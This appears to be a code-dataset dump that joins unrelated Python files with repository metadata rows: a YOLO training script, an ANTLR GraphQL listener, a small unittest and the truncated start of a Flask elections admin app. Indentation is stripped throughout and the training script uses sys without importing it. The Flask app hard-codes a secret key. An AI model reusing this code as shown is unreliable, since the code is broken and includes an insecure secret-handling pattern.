if len(sys.argv) != 4:
print('Usage:')
print('python train.py datacfg cfgfile weightfile')
exit()
import time
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.backends.cudnn as cudnn
from torchvision import datasets, transforms
from torch.autograd import Variable
import dataset
import random
import math
import os
from utils import *
from cfg import parse_cfg
from region_loss import RegionLoss
from darknet import Darknet
from models.tiny_yolo import TinyYoloNet
# Training settings
datacfg = sys.argv[1]
cfgfile = sys.argv[2]
weightfile = sys.argv[3]
data_options = read_data_cfg(datacfg)
net_options = parse_cfg(cfgfile)[0]
trainlist = data_options['train']
testlist = data_options['valid']
backupdir = data_options['backup']
nsamples = file_lines(trainlist)
gpus = data_options['gpus'] # e.g. 0,1,2,3
ngpus = len(gpus.split(','))
num_workers = int(data_options['num_workers'])
batch_size = int(net_options['batch'])
max_batches = int(net_options['max_batches'])
learning_rate = float(net_options['learning_rate'])
momentum = float(net_options['momentum'])
decay = float(net_options['decay'])
steps = [float(step) for step in net_options['steps'].split(',')]
scales = [float(scale) for scale in net_options['scales'].split(',')]
#Train parameters
max_epochs = max_batches*batch_size/nsamples+1
use_cuda = True
seed = int(time.time())
eps = 1e-5
save_interval = 10 # epoches
dot_interval = 70 # batches
# Test parameters
conf_thresh = 0.25
nms_thresh = 0.4
iou_thresh = 0.5
if not os.path.exists(backupdir):
os.mkdir(backupdir)
###############
torch.manual_seed(seed)
if use_cuda:
os.environ['CUDA_VISIBLE_DEVICES'] = gpus
torch.cuda.manual_seed(seed)
model = Darknet(cfgfile)
region_loss = model.loss
model.load_weights(weightfile)
layers = list(model.children())[0]
for item in list(layers)[:-2]:
item.requires_grad=False
model.print_network()
region_loss.seen = model.seen
processed_batches = model.seen/batch_size
init_width = model.width
init_height = model.height
init_epoch = 0 #model.seen/nsamples
kwargs = {'num_workers': num_workers, 'pin_memory': True} if use_cuda else {}
test_loader = torch.utils.data.DataLoader(
dataset.listDataset(testlist, shape=(init_width, init_height),
shuffle=False,
transform=transforms.Compose([
transforms.ToTensor(),
]), train=False),
batch_size=batch_size, shuffle=False, **kwargs)
if use_cuda:
if ngpus > 1:
model = torch.nn.DataParallel(model).cuda()
else:
model = model.cuda()
params_dict = dict(model.named_parameters())
params = []
for key, value in params_dict.items():
if key.find('.bn') >= 0 or key.find('.bias') >= 0:
params += [{'params': [value], 'weight_decay': 0.0}]
else:
params += [{'params': [value], 'weight_decay': decay*batch_size}]
optimizer = optim.SGD(model.parameters(), lr=learning_rate, momentum=momentum, dampening=0, weight_decay=decay*batch_size)
def adjust_learning_rate(optimizer, batch):
"""Sets the learning rate to the initial LR decayed by 10 every 30 epochs"""
lr = learning_rate
for i in range(len(steps)):
scale = scales[i] if i < len(scales) else 1
if batch >= steps[i]:
lr = lr * scale
if batch == steps[i]:
break
else:
break
for param_group in optimizer.param_groups:
param_group['lr'] = lr/batch_size
return lr
def train(epoch):
global processed_batches
t0 = time.time()
if ngpus > 1:
cur_model = model.module
else:
cur_model = model
train_loader = torch.utils.data.DataLoader(
dataset.listDataset(trainlist, shape=(init_width, init_height),
shuffle=True,
transform=transforms.Compose([
transforms.ToTensor(),
]),
train=True,
seen=cur_model.seen,
batch_size=batch_size,
num_workers=num_workers),
batch_size=batch_size, shuffle=False, **kwargs)
lr = learning_rate #adjust_learning_rate(optimizer, processed_batches)
logging('epoch %d, processed %d samples, lr %f' % (epoch, epoch * len(train_loader.dataset), lr))
model.train()
t1 = time.time()
avg_time = torch.zeros(9)
for batch_idx, (data, target) in enumerate(train_loader):
t2 = time.time()
# adjust_learning_rate(optimizer, processed_batches)
processed_batches = processed_batches + 1
#if (batch_idx+1) % dot_interval == 0:
# sys.stdout.write('.')
if use_cuda:
data = data.cuda()
#target= target.cuda()
t3 = time.time()
data, target = Variable(data), Variable(target)
t4 = time.time()
optimizer.zero_grad()
t5 = time.time()
output = model(data)
t6 = time.time()
region_loss.seen = region_loss.seen + data.data.size(0)
loss = region_loss(output, target)
t7 = time.time()
loss.backward()
t8 = time.time()
optimizer.step()
t9 = time.time()
if False and batch_idx > 1:
avg_time[0] = avg_time[0] + (t2-t1)
avg_time[1] = avg_time[1] + (t3-t2)
avg_time[2] = avg_time[2] + (t4-t3)
avg_time[3] = avg_time[3] + (t5-t4)
avg_time[4] = avg_time[4] + (t6-t5)
avg_time[5] = avg_time[5] + (t7-t6)
avg_time[6] = avg_time[6] + (t8-t7)
avg_time[7] = avg_time[7] + (t9-t8)
avg_time[8] = avg_time[8] + (t9-t1)
('-------------------------------')
print(' load data : %f' % (avg_time[0]/(batch_idx)))
print(' cpu to cuda : %f' % (avg_time[1]/(batch_idx)))
print('cuda to variable : %f' % (avg_time[2]/(batch_idx)))
print(' zero_grad : %f' % (avg_time[3]/(batch_idx)))
print(' forward feature : %f' % (avg_time[4]/(batch_idx)))
print(' forward loss : %f' % (avg_time[5]/(batch_idx)))
print(' backward : %f' % (avg_time[6]/(batch_idx)))
print(' step : %f' % (avg_time[7]/(batch_idx)))
print(' total : %f' % (avg_time[8]/(batch_idx)))
t1 = time.time()
print('')
t1 = time.time()
logging('training with %f samples/s' % (len(train_loader.dataset)/(t1-t0)))
if (epoch+1) % save_interval == 0:
logging('save weights to %s/%06d.weights' % (backupdir, epoch+1))
cur_model.seen = (epoch + 1) * len(train_loader.dataset)
cur_model.save_weights('%s/%06d.weights' % (backupdir, epoch+1))
def test(epoch):
def truths_length(truths):
for i in range(50):
if truths[i][1] == 0:
return i
model.eval()
if ngpus > 1:
cur_model = model.module
else:
cur_model = model
num_classes = cur_model.num_classes
anchors = cur_model.anchors
num_anchors = cur_model.num_anchors
total = 0.0
proposals = 0.0
correct = 0.0
for batch_idx, (data, target) in enumerate(test_loader):
if use_cuda:
data = data.cuda()
data = Variable(data, volatile=True)
output = model(data).data
all_boxes = get_region_boxes(output, conf_thresh, num_classes, anchors, num_anchors)
for i in range(output.size(0)):
boxes = all_boxes[i]
boxes = nms(boxes, nms_thresh)
truths = target[i].view(-1, 5)
num_gts = truths_length(truths)
total = total + num_gts
for i in range(len(boxes)):
if boxes[i][4] > conf_thresh:
proposals = proposals+1
for i in range(num_gts):
box_gt = [truths[i][1], truths[i][2], truths[i][3], truths[i][4], 1.0, 1.0, truths[i][0]]
best_iou = 0
best_j = -1
for j in range(len(boxes)):
iou = bbox_iou(box_gt, boxes[j], x1y1x2y2=False)
if iou > best_iou:
best_j = j
best_iou = iou
if best_iou > iou_thresh and boxes[best_j][6] == box_gt[6]:
correct = correct+1
precision = 1.0*correct/(proposals+eps)
recall = 1.0*correct/(total+eps)
fscore = 2.0*precision*recall/(precision+recall+eps)
logging("precision: %f, recall: %f, fscore: %f" % (precision, recall, fscore))
evaluate = False
if evaluate:
logging('evaluating ...')
test(0)
else:
for epoch in range(int(init_epoch), int(max_epochs)):
train(epoch)
test(epoch)
| 33.839552 | 122 | 0.582424 |
0d928312a375c95ae1bbf7deb1d0053d3397e001 | 22,980 | py | Python | schemagen/antlr/GraphQLListener.py | GoZaddy/SchemaGen | c8374382f6b52ad3cec398c77fd5bc90fe891818 | [
"MIT"
] | 3 | 2021-03-26T22:51:41.000Z | 2021-03-27T15:17:24.000Z | schemagen/antlr/GraphQLListener.py | GoZaddy/SchemaGen | c8374382f6b52ad3cec398c77fd5bc90fe891818 | [
"MIT"
] | null | null | null | schemagen/antlr/GraphQLListener.py | GoZaddy/SchemaGen | c8374382f6b52ad3cec398c77fd5bc90fe891818 | [
"MIT"
] | null | null | null | # Generated from GraphQL.g4 by ANTLR 4.9
from antlr4 import *
if __name__ is not None and "." in __name__:
from .GraphQLParser import GraphQLParser
else:
from GraphQLParser import GraphQLParser
# This class defines a complete listener for a parse tree produced by GraphQLParser.
class GraphQLListener(ParseTreeListener):
# Enter a parse tree produced by GraphQLParser#document.
def enterDocument(self, ctx:GraphQLParser.DocumentContext):
pass
# Exit a parse tree produced by GraphQLParser#document.
def exitDocument(self, ctx:GraphQLParser.DocumentContext):
pass
# Enter a parse tree produced by GraphQLParser#definition.
def enterDefinition(self, ctx:GraphQLParser.DefinitionContext):
pass
# Exit a parse tree produced by GraphQLParser#definition.
def exitDefinition(self, ctx:GraphQLParser.DefinitionContext):
pass
# Enter a parse tree produced by GraphQLParser#executableDefinition.
def enterExecutableDefinition(self, ctx:GraphQLParser.ExecutableDefinitionContext):
pass
# Exit a parse tree produced by GraphQLParser#executableDefinition.
def exitExecutableDefinition(self, ctx:GraphQLParser.ExecutableDefinitionContext):
pass
# Enter a parse tree produced by GraphQLParser#operationDefinition.
def enterOperationDefinition(self, ctx:GraphQLParser.OperationDefinitionContext):
pass
# Exit a parse tree produced by GraphQLParser#operationDefinition.
def exitOperationDefinition(self, ctx:GraphQLParser.OperationDefinitionContext):
pass
# Enter a parse tree produced by GraphQLParser#operationType.
def enterOperationType(self, ctx:GraphQLParser.OperationTypeContext):
pass
# Exit a parse tree produced by GraphQLParser#operationType.
def exitOperationType(self, ctx:GraphQLParser.OperationTypeContext):
pass
# Enter a parse tree produced by GraphQLParser#selectionSet.
def enterSelectionSet(self, ctx:GraphQLParser.SelectionSetContext):
pass
# Exit a parse tree produced by GraphQLParser#selectionSet.
def exitSelectionSet(self, ctx:GraphQLParser.SelectionSetContext):
pass
# Enter a parse tree produced by GraphQLParser#selection.
def enterSelection(self, ctx:GraphQLParser.SelectionContext):
pass
# Exit a parse tree produced by GraphQLParser#selection.
def exitSelection(self, ctx:GraphQLParser.SelectionContext):
pass
# Enter a parse tree produced by GraphQLParser#field.
def enterField(self, ctx:GraphQLParser.FieldContext):
pass
# Exit a parse tree produced by GraphQLParser#field.
def exitField(self, ctx:GraphQLParser.FieldContext):
pass
# Enter a parse tree produced by GraphQLParser#arguments.
def enterArguments(self, ctx:GraphQLParser.ArgumentsContext):
pass
# Exit a parse tree produced by GraphQLParser#arguments.
def exitArguments(self, ctx:GraphQLParser.ArgumentsContext):
pass
# Enter a parse tree produced by GraphQLParser#argument.
def enterArgument(self, ctx:GraphQLParser.ArgumentContext):
pass
# Exit a parse tree produced by GraphQLParser#argument.
def exitArgument(self, ctx:GraphQLParser.ArgumentContext):
pass
# Enter a parse tree produced by GraphQLParser#alias.
def enterAlias(self, ctx:GraphQLParser.AliasContext):
pass
# Exit a parse tree produced by GraphQLParser#alias.
def exitAlias(self, ctx:GraphQLParser.AliasContext):
pass
# Enter a parse tree produced by GraphQLParser#fragmentSpread.
def enterFragmentSpread(self, ctx:GraphQLParser.FragmentSpreadContext):
pass
# Exit a parse tree produced by GraphQLParser#fragmentSpread.
def exitFragmentSpread(self, ctx:GraphQLParser.FragmentSpreadContext):
pass
# Enter a parse tree produced by GraphQLParser#fragmentDefinition.
def enterFragmentDefinition(self, ctx:GraphQLParser.FragmentDefinitionContext):
pass
# Exit a parse tree produced by GraphQLParser#fragmentDefinition.
def exitFragmentDefinition(self, ctx:GraphQLParser.FragmentDefinitionContext):
pass
# Enter a parse tree produced by GraphQLParser#fragmentName.
def enterFragmentName(self, ctx:GraphQLParser.FragmentNameContext):
pass
# Exit a parse tree produced by GraphQLParser#fragmentName.
def exitFragmentName(self, ctx:GraphQLParser.FragmentNameContext):
pass
# Enter a parse tree produced by GraphQLParser#typeCondition.
def enterTypeCondition(self, ctx:GraphQLParser.TypeConditionContext):
pass
# Exit a parse tree produced by GraphQLParser#typeCondition.
def exitTypeCondition(self, ctx:GraphQLParser.TypeConditionContext):
pass
# Enter a parse tree produced by GraphQLParser#inlineFragment.
def enterInlineFragment(self, ctx:GraphQLParser.InlineFragmentContext):
pass
# Exit a parse tree produced by GraphQLParser#inlineFragment.
def exitInlineFragment(self, ctx:GraphQLParser.InlineFragmentContext):
pass
# Enter a parse tree produced by GraphQLParser#value.
def enterValue(self, ctx:GraphQLParser.ValueContext):
pass
# Exit a parse tree produced by GraphQLParser#value.
def exitValue(self, ctx:GraphQLParser.ValueContext):
pass
# Enter a parse tree produced by GraphQLParser#intValue.
def enterIntValue(self, ctx:GraphQLParser.IntValueContext):
pass
# Exit a parse tree produced by GraphQLParser#intValue.
def exitIntValue(self, ctx:GraphQLParser.IntValueContext):
pass
# Enter a parse tree produced by GraphQLParser#floatValue.
def enterFloatValue(self, ctx:GraphQLParser.FloatValueContext):
pass
# Exit a parse tree produced by GraphQLParser#floatValue.
def exitFloatValue(self, ctx:GraphQLParser.FloatValueContext):
pass
# Enter a parse tree produced by GraphQLParser#booleanValue.
def enterBooleanValue(self, ctx:GraphQLParser.BooleanValueContext):
pass
# Exit a parse tree produced by GraphQLParser#booleanValue.
def exitBooleanValue(self, ctx:GraphQLParser.BooleanValueContext):
pass
# Enter a parse tree produced by GraphQLParser#stringValue.
def enterStringValue(self, ctx:GraphQLParser.StringValueContext):
pass
# Exit a parse tree produced by GraphQLParser#stringValue.
def exitStringValue(self, ctx:GraphQLParser.StringValueContext):
pass
# Enter a parse tree produced by GraphQLParser#nullValue.
def enterNullValue(self, ctx:GraphQLParser.NullValueContext):
pass
# Exit a parse tree produced by GraphQLParser#nullValue.
def exitNullValue(self, ctx:GraphQLParser.NullValueContext):
pass
# Enter a parse tree produced by GraphQLParser#enumValue.
def enterEnumValue(self, ctx:GraphQLParser.EnumValueContext):
pass
# Exit a parse tree produced by GraphQLParser#enumValue.
def exitEnumValue(self, ctx:GraphQLParser.EnumValueContext):
pass
# Enter a parse tree produced by GraphQLParser#listValue.
def enterListValue(self, ctx:GraphQLParser.ListValueContext):
pass
# Exit a parse tree produced by GraphQLParser#listValue.
def exitListValue(self, ctx:GraphQLParser.ListValueContext):
pass
# Enter a parse tree produced by GraphQLParser#objectValue.
def enterObjectValue(self, ctx:GraphQLParser.ObjectValueContext):
pass
# Exit a parse tree produced by GraphQLParser#objectValue.
def exitObjectValue(self, ctx:GraphQLParser.ObjectValueContext):
pass
# Enter a parse tree produced by GraphQLParser#objectField.
def enterObjectField(self, ctx:GraphQLParser.ObjectFieldContext):
pass
# Exit a parse tree produced by GraphQLParser#objectField.
def exitObjectField(self, ctx:GraphQLParser.ObjectFieldContext):
pass
# Enter a parse tree produced by GraphQLParser#variable.
def enterVariable(self, ctx:GraphQLParser.VariableContext):
pass
# Exit a parse tree produced by GraphQLParser#variable.
def exitVariable(self, ctx:GraphQLParser.VariableContext):
pass
# Enter a parse tree produced by GraphQLParser#variableDefinitions.
def enterVariableDefinitions(self, ctx:GraphQLParser.VariableDefinitionsContext):
pass
# Exit a parse tree produced by GraphQLParser#variableDefinitions.
def exitVariableDefinitions(self, ctx:GraphQLParser.VariableDefinitionsContext):
pass
# Enter a parse tree produced by GraphQLParser#variableDefinition.
def enterVariableDefinition(self, ctx:GraphQLParser.VariableDefinitionContext):
pass
# Exit a parse tree produced by GraphQLParser#variableDefinition.
def exitVariableDefinition(self, ctx:GraphQLParser.VariableDefinitionContext):
pass
# Enter a parse tree produced by GraphQLParser#defaultValue.
def enterDefaultValue(self, ctx:GraphQLParser.DefaultValueContext):
pass
# Exit a parse tree produced by GraphQLParser#defaultValue.
def exitDefaultValue(self, ctx:GraphQLParser.DefaultValueContext):
pass
# Enter a parse tree produced by GraphQLParser#type_.
def enterType_(self, ctx:GraphQLParser.Type_Context):
pass
# Exit a parse tree produced by GraphQLParser#type_.
def exitType_(self, ctx:GraphQLParser.Type_Context):
pass
# Enter a parse tree produced by GraphQLParser#namedType.
def enterNamedType(self, ctx:GraphQLParser.NamedTypeContext):
pass
# Exit a parse tree produced by GraphQLParser#namedType.
def exitNamedType(self, ctx:GraphQLParser.NamedTypeContext):
pass
# Enter a parse tree produced by GraphQLParser#listType.
def enterListType(self, ctx:GraphQLParser.ListTypeContext):
pass
# Exit a parse tree produced by GraphQLParser#listType.
def exitListType(self, ctx:GraphQLParser.ListTypeContext):
pass
# Enter a parse tree produced by GraphQLParser#directives.
def enterDirectives(self, ctx:GraphQLParser.DirectivesContext):
pass
# Exit a parse tree produced by GraphQLParser#directives.
def exitDirectives(self, ctx:GraphQLParser.DirectivesContext):
pass
# Enter a parse tree produced by GraphQLParser#directive.
def enterDirective(self, ctx:GraphQLParser.DirectiveContext):
pass
# Exit a parse tree produced by GraphQLParser#directive.
def exitDirective(self, ctx:GraphQLParser.DirectiveContext):
pass
# Enter a parse tree produced by GraphQLParser#typeSystemDefinition.
def enterTypeSystemDefinition(self, ctx:GraphQLParser.TypeSystemDefinitionContext):
pass
# Exit a parse tree produced by GraphQLParser#typeSystemDefinition.
def exitTypeSystemDefinition(self, ctx:GraphQLParser.TypeSystemDefinitionContext):
pass
# Enter a parse tree produced by GraphQLParser#typeSystemExtension.
def enterTypeSystemExtension(self, ctx:GraphQLParser.TypeSystemExtensionContext):
pass
# Exit a parse tree produced by GraphQLParser#typeSystemExtension.
def exitTypeSystemExtension(self, ctx:GraphQLParser.TypeSystemExtensionContext):
pass
# Enter a parse tree produced by GraphQLParser#schemaDefinition.
def enterSchemaDefinition(self, ctx:GraphQLParser.SchemaDefinitionContext):
pass
# Exit a parse tree produced by GraphQLParser#schemaDefinition.
def exitSchemaDefinition(self, ctx:GraphQLParser.SchemaDefinitionContext):
pass
# Enter a parse tree produced by GraphQLParser#rootOperationTypeDefinition.
def enterRootOperationTypeDefinition(self, ctx:GraphQLParser.RootOperationTypeDefinitionContext):
pass
# Exit a parse tree produced by GraphQLParser#rootOperationTypeDefinition.
def exitRootOperationTypeDefinition(self, ctx:GraphQLParser.RootOperationTypeDefinitionContext):
pass
# Enter a parse tree produced by GraphQLParser#schemaExtension.
def enterSchemaExtension(self, ctx:GraphQLParser.SchemaExtensionContext):
pass
# Exit a parse tree produced by GraphQLParser#schemaExtension.
def exitSchemaExtension(self, ctx:GraphQLParser.SchemaExtensionContext):
pass
# Enter a parse tree produced by GraphQLParser#operationTypeDefinition.
def enterOperationTypeDefinition(self, ctx:GraphQLParser.OperationTypeDefinitionContext):
pass
# Exit a parse tree produced by GraphQLParser#operationTypeDefinition.
def exitOperationTypeDefinition(self, ctx:GraphQLParser.OperationTypeDefinitionContext):
pass
# Enter a parse tree produced by GraphQLParser#description.
def enterDescription(self, ctx:GraphQLParser.DescriptionContext):
pass
# Exit a parse tree produced by GraphQLParser#description.
def exitDescription(self, ctx:GraphQLParser.DescriptionContext):
pass
# Enter a parse tree produced by GraphQLParser#typeDefinition.
def enterTypeDefinition(self, ctx:GraphQLParser.TypeDefinitionContext):
pass
# Exit a parse tree produced by GraphQLParser#typeDefinition.
def exitTypeDefinition(self, ctx:GraphQLParser.TypeDefinitionContext):
pass
# Enter a parse tree produced by GraphQLParser#typeExtension.
def enterTypeExtension(self, ctx:GraphQLParser.TypeExtensionContext):
pass
# Exit a parse tree produced by GraphQLParser#typeExtension.
def exitTypeExtension(self, ctx:GraphQLParser.TypeExtensionContext):
pass
# Enter a parse tree produced by GraphQLParser#scalarTypeDefinition.
def enterScalarTypeDefinition(self, ctx:GraphQLParser.ScalarTypeDefinitionContext):
pass
# Exit a parse tree produced by GraphQLParser#scalarTypeDefinition.
def exitScalarTypeDefinition(self, ctx:GraphQLParser.ScalarTypeDefinitionContext):
pass
# Enter a parse tree produced by GraphQLParser#scalarTypeExtension.
def enterScalarTypeExtension(self, ctx:GraphQLParser.ScalarTypeExtensionContext):
pass
# Exit a parse tree produced by GraphQLParser#scalarTypeExtension.
def exitScalarTypeExtension(self, ctx:GraphQLParser.ScalarTypeExtensionContext):
pass
# Enter a parse tree produced by GraphQLParser#objectTypeDefinition.
def enterObjectTypeDefinition(self, ctx:GraphQLParser.ObjectTypeDefinitionContext):
pass
# Exit a parse tree produced by GraphQLParser#objectTypeDefinition.
def exitObjectTypeDefinition(self, ctx:GraphQLParser.ObjectTypeDefinitionContext):
pass
# Enter a parse tree produced by GraphQLParser#implementsInterfaces.
def enterImplementsInterfaces(self, ctx:GraphQLParser.ImplementsInterfacesContext):
pass
# Exit a parse tree produced by GraphQLParser#implementsInterfaces.
def exitImplementsInterfaces(self, ctx:GraphQLParser.ImplementsInterfacesContext):
pass
# Enter a parse tree produced by GraphQLParser#fieldsDefinition.
def enterFieldsDefinition(self, ctx:GraphQLParser.FieldsDefinitionContext):
pass
# Exit a parse tree produced by GraphQLParser#fieldsDefinition.
def exitFieldsDefinition(self, ctx:GraphQLParser.FieldsDefinitionContext):
pass
# Enter a parse tree produced by GraphQLParser#fieldDefinition.
def enterFieldDefinition(self, ctx:GraphQLParser.FieldDefinitionContext):
pass
# Exit a parse tree produced by GraphQLParser#fieldDefinition.
def exitFieldDefinition(self, ctx:GraphQLParser.FieldDefinitionContext):
pass
# Enter a parse tree produced by GraphQLParser#argumentsDefinition.
def enterArgumentsDefinition(self, ctx:GraphQLParser.ArgumentsDefinitionContext):
pass
# Exit a parse tree produced by GraphQLParser#argumentsDefinition.
def exitArgumentsDefinition(self, ctx:GraphQLParser.ArgumentsDefinitionContext):
pass
# Enter a parse tree produced by GraphQLParser#inputValueDefinition.
def enterInputValueDefinition(self, ctx:GraphQLParser.InputValueDefinitionContext):
pass
# Exit a parse tree produced by GraphQLParser#inputValueDefinition.
def exitInputValueDefinition(self, ctx:GraphQLParser.InputValueDefinitionContext):
pass
# Enter a parse tree produced by GraphQLParser#objectTypeExtension.
def enterObjectTypeExtension(self, ctx:GraphQLParser.ObjectTypeExtensionContext):
pass
# Exit a parse tree produced by GraphQLParser#objectTypeExtension.
def exitObjectTypeExtension(self, ctx:GraphQLParser.ObjectTypeExtensionContext):
pass
# Enter a parse tree produced by GraphQLParser#interfaceTypeDefinition.
def enterInterfaceTypeDefinition(self, ctx:GraphQLParser.InterfaceTypeDefinitionContext):
pass
# Exit a parse tree produced by GraphQLParser#interfaceTypeDefinition.
def exitInterfaceTypeDefinition(self, ctx:GraphQLParser.InterfaceTypeDefinitionContext):
pass
# Enter a parse tree produced by GraphQLParser#interfaceTypeExtension.
def enterInterfaceTypeExtension(self, ctx:GraphQLParser.InterfaceTypeExtensionContext):
pass
# Exit a parse tree produced by GraphQLParser#interfaceTypeExtension.
def exitInterfaceTypeExtension(self, ctx:GraphQLParser.InterfaceTypeExtensionContext):
pass
# Enter a parse tree produced by GraphQLParser#unionTypeDefinition.
def enterUnionTypeDefinition(self, ctx:GraphQLParser.UnionTypeDefinitionContext):
pass
# Exit a parse tree produced by GraphQLParser#unionTypeDefinition.
def exitUnionTypeDefinition(self, ctx:GraphQLParser.UnionTypeDefinitionContext):
pass
# Enter a parse tree produced by GraphQLParser#unionMemberTypes.
def enterUnionMemberTypes(self, ctx:GraphQLParser.UnionMemberTypesContext):
pass
# Exit a parse tree produced by GraphQLParser#unionMemberTypes.
def exitUnionMemberTypes(self, ctx:GraphQLParser.UnionMemberTypesContext):
pass
# Enter a parse tree produced by GraphQLParser#unionTypeExtension.
def enterUnionTypeExtension(self, ctx:GraphQLParser.UnionTypeExtensionContext):
pass
# Exit a parse tree produced by GraphQLParser#unionTypeExtension.
def exitUnionTypeExtension(self, ctx:GraphQLParser.UnionTypeExtensionContext):
pass
# Enter a parse tree produced by GraphQLParser#enumTypeDefinition.
def enterEnumTypeDefinition(self, ctx:GraphQLParser.EnumTypeDefinitionContext):
pass
# Exit a parse tree produced by GraphQLParser#enumTypeDefinition.
def exitEnumTypeDefinition(self, ctx:GraphQLParser.EnumTypeDefinitionContext):
pass
# Enter a parse tree produced by GraphQLParser#enumValuesDefinition.
def enterEnumValuesDefinition(self, ctx:GraphQLParser.EnumValuesDefinitionContext):
pass
# Exit a parse tree produced by GraphQLParser#enumValuesDefinition.
def exitEnumValuesDefinition(self, ctx:GraphQLParser.EnumValuesDefinitionContext):
pass
# Enter a parse tree produced by GraphQLParser#enumValueDefinition.
def enterEnumValueDefinition(self, ctx:GraphQLParser.EnumValueDefinitionContext):
pass
# Exit a parse tree produced by GraphQLParser#enumValueDefinition.
def exitEnumValueDefinition(self, ctx:GraphQLParser.EnumValueDefinitionContext):
pass
# Enter a parse tree produced by GraphQLParser#enumTypeExtension.
def enterEnumTypeExtension(self, ctx:GraphQLParser.EnumTypeExtensionContext):
pass
# Exit a parse tree produced by GraphQLParser#enumTypeExtension.
def exitEnumTypeExtension(self, ctx:GraphQLParser.EnumTypeExtensionContext):
pass
# Enter a parse tree produced by GraphQLParser#inputObjectTypeDefinition.
def enterInputObjectTypeDefinition(self, ctx:GraphQLParser.InputObjectTypeDefinitionContext):
pass
# Exit a parse tree produced by GraphQLParser#inputObjectTypeDefinition.
def exitInputObjectTypeDefinition(self, ctx:GraphQLParser.InputObjectTypeDefinitionContext):
pass
# Enter a parse tree produced by GraphQLParser#inputFieldsDefinition.
def enterInputFieldsDefinition(self, ctx:GraphQLParser.InputFieldsDefinitionContext):
pass
# Exit a parse tree produced by GraphQLParser#inputFieldsDefinition.
def exitInputFieldsDefinition(self, ctx:GraphQLParser.InputFieldsDefinitionContext):
pass
# Enter a parse tree produced by GraphQLParser#inputObjectTypeExtension.
def enterInputObjectTypeExtension(self, ctx:GraphQLParser.InputObjectTypeExtensionContext):
pass
# Exit a parse tree produced by GraphQLParser#inputObjectTypeExtension.
def exitInputObjectTypeExtension(self, ctx:GraphQLParser.InputObjectTypeExtensionContext):
pass
# Enter a parse tree produced by GraphQLParser#directiveDefinition.
def enterDirectiveDefinition(self, ctx:GraphQLParser.DirectiveDefinitionContext):
pass
# Exit a parse tree produced by GraphQLParser#directiveDefinition.
def exitDirectiveDefinition(self, ctx:GraphQLParser.DirectiveDefinitionContext):
pass
# Enter a parse tree produced by GraphQLParser#directiveLocations.
def enterDirectiveLocations(self, ctx:GraphQLParser.DirectiveLocationsContext):
pass
# Exit a parse tree produced by GraphQLParser#directiveLocations.
def exitDirectiveLocations(self, ctx:GraphQLParser.DirectiveLocationsContext):
pass
# Enter a parse tree produced by GraphQLParser#directiveLocation.
def enterDirectiveLocation(self, ctx:GraphQLParser.DirectiveLocationContext):
pass
# Exit a parse tree produced by GraphQLParser#directiveLocation.
def exitDirectiveLocation(self, ctx:GraphQLParser.DirectiveLocationContext):
pass
# Enter a parse tree produced by GraphQLParser#executableDirectiveLocation.
def enterExecutableDirectiveLocation(self, ctx:GraphQLParser.ExecutableDirectiveLocationContext):
pass
# Exit a parse tree produced by GraphQLParser#executableDirectiveLocation.
def exitExecutableDirectiveLocation(self, ctx:GraphQLParser.ExecutableDirectiveLocationContext):
pass
# Enter a parse tree produced by GraphQLParser#typeSystemDirectiveLocation.
def enterTypeSystemDirectiveLocation(self, ctx:GraphQLParser.TypeSystemDirectiveLocationContext):
pass
# Exit a parse tree produced by GraphQLParser#typeSystemDirectiveLocation.
def exitTypeSystemDirectiveLocation(self, ctx:GraphQLParser.TypeSystemDirectiveLocationContext):
pass
# Enter a parse tree produced by GraphQLParser#name.
def enterName(self, ctx:GraphQLParser.NameContext):
pass
# Exit a parse tree produced by GraphQLParser#name.
def exitName(self, ctx:GraphQLParser.NameContext):
pass
del GraphQLParser | 35.299539 | 101 | 0.758964 |
a914383576c54aa31117d4d8b56250d201d6b25c | 355 | py | Python | tests/test_meshinery.py | drozdziak1/meshinery | 65d3e1eba071ddf4b803909e9d42ef61c4de22c1 | [
"MIT"
] | null | null | null | tests/test_meshinery.py | drozdziak1/meshinery | 65d3e1eba071ddf4b803909e9d42ef61c4de22c1 | [
"MIT"
] | null | null | null | tests/test_meshinery.py | drozdziak1/meshinery | 65d3e1eba071ddf4b803909e9d42ef61c4de22c1 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
test_meshinery
----------------------------------
Tests for `meshinery` module.
"""
import unittest
import meshinery
class TestMeshinery(unittest.TestCase):
def setUp(self):
pass
def test_something(self):
assert(meshinery.__version__)
def tearDown(self):
pass
| 13.653846 | 39 | 0.583099 |
f80741a074820c036344c63bfcaa99ae45e9d2a4 | 5,571 | py | Python | admin_app.py | nprapps/elections14 | b89f65aa276eebb790594f456d58e741066c1f93 | [
"MIT"
] | 5 | 2015-01-23T19:23:21.000Z | 2015-05-01T17:15:13.000Z | admin_app.py | nprapps/elections14 | b89f65aa276eebb790594f456d58e741066c1f93 | [
"MIT"
] | 1 | 2015-02-04T18:58:40.000Z | 2015-02-04T18:58:40.000Z | admin_app.py | nprapps/elections14 | b89f65aa276eebb790594f456d58e741066c1f93 | [
"MIT"
] | 1 | 2021-02-23T10:25:25.000Z | 2021-02-23T10:25:25.000Z | #!/usr/bin/env python
import argparse
import datetime
import json
import logging
import subprocess
import boto
from boto.s3.key import Key
from fabfile import stack
from flask import Flask, render_template
from flask_peewee.auth import Auth
from flask_peewee.db import Database
from flask_peewee.admin import Admin, ModelAdmin
from models import Slide, SlideSequence, Race, Candidate
from peewee import fn
import app_config
from render_utils import make_context, urlencode_filter, smarty_filter
import static_app
app = Flask(__name__)
app.config['PROPAGATE_EXCEPTIONS'] = True
app.config['DATABASE'] = app_config.DATABASE
app.config['SECRET_KEY'] = 'askfhj3r3j'
app.jinja_env.filters['urlencode'] = urlencode_filter
app.jinja_env.filters['smarty'] = smarty_filter
app.register_blueprint(static_app.static_app, url_prefix='/%s' % app_config.PROJECT_SLUG)
file_handler = logging.FileHandler('%s/app.log' % app_config.SERVER_LOG_PATH)
file_handler.setLevel(logging.INFO)
app.logger.addHandler(file_handler)
app.logger.setLevel(logging.INFO)
class SlideAdmin(ModelAdmin):
exclude = ('slug',)
# Set up flask peewee db wrapper
db = Database(app)
auth = Auth(app, db, prefix='/%s/accounts' % app_config.PROJECT_SLUG)
admin = Admin(app, auth, prefix='/%s/admin' % app_config.PROJECT_SLUG)
admin.register(Slide, SlideAdmin)
admin.register(SlideSequence)
admin.setup()
@app.route('/%s/admin/stack/' % app_config.PROJECT_SLUG, methods=['GET'])
def _stack():
"""
Administer a stack of slides.
"""
context = make_context(asset_depth=1)
sequence = SlideSequence.select()
